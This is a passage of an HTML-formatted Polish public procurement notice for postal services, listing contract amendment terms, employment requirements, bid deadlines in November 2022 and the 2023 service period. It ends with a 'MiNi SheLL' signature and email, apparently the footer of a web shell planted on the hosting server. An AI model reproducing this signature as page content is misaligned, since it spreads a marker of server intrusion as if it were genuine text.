postępowaniu,<br/>3)	podpisany przez pełnomocnika załącznik nr 3 do SWZ, tj. informację o powierzeniu lub niepowierzeniu podwykonawcy części zamówienia.<br/>4)	podpisany przez pełnomocnika załącznik nr 5 do SWZ, z którego będzie wynikać, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają formy pisemnego aneksu pod rygorem nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności z regulacjami zawartymi w ustawie Prawo zamówień publicznych.<br/>2.	Zmiany, o których mowa w pkt 1. mogą:<br/>1)	dotyczyć obniżenia cen jednostkowych netto zaoferowanych przez Wykonawcę w ofercie (formularz ofertowy). W przypadku obniżenia przez Wykonawcę cen jednostkowych netto w toku realizacji umowy, przy niezmienionym poziomie jakości świadczonych usług. Wykonawca ma obowiązek stosować względem Zamawiającego obniżone ceny dla usług, wynikające ze swojego aktualnego cennika, <br/>2)	dotyczyć godzin dostarczania przez Wykonawcę do siedziby Zamawiającego przesyłek poczty wpływającej,<br/>3)	dotyczyć godzin dostarczania przez Zamawiającego do siedziby placówki nadawczej Wykonawcy przesyłek przeznaczonych do nadania,<br/>4)	dotyczyć godzin odbioru przez Wykonawcę z siedziby Zamawiającego przesyłek przeznaczonych do nadania (w przypadku korzystania z ww. usługi),<br/>5)	dotyczyć korzystnych dla Zamawiającego modyfikacji świadczonych usług (wprowadzenie nowych usług, rozszerzenie lub modyfikacja usług obecnych),<br/>6)	być związane ze zmianą przepisów powszechnie obowiązującego prawa, jeśli wpływa ona na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy,<br/>7)	dotyczyć siedziby/b placówki/ek Wykonawcy obsługującej/ych Zamawiającego. Zamawiający za porozumieniem stron dopuszcza możliwość zmiany siedziby/ placówki/ek Wykonawcy pod warunkiem, że nowa/e siedziba/y placówki/ek Wykonawcy będzie/ą zlokalizowana/e w miejscowości, w której znajduje się siedziba Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Świadczenie usług nastąpi od dnia podpisania umowy, jednak nie wcześniej niż od dnia 1 stycznia 2023 roku do wyczerpania środków finansowych stanowiących wynagrodzenie wykonawcy za wykonanie usług objętych umową, jednak nie dłużej niż do dnia 31 grudnia 2023 roku.

Creat By MiNi SheLL
Email: jattceo@gmail.com